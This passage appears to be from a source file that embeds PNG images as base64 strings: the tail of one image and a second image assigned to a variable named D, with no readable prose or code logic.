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"""
D="""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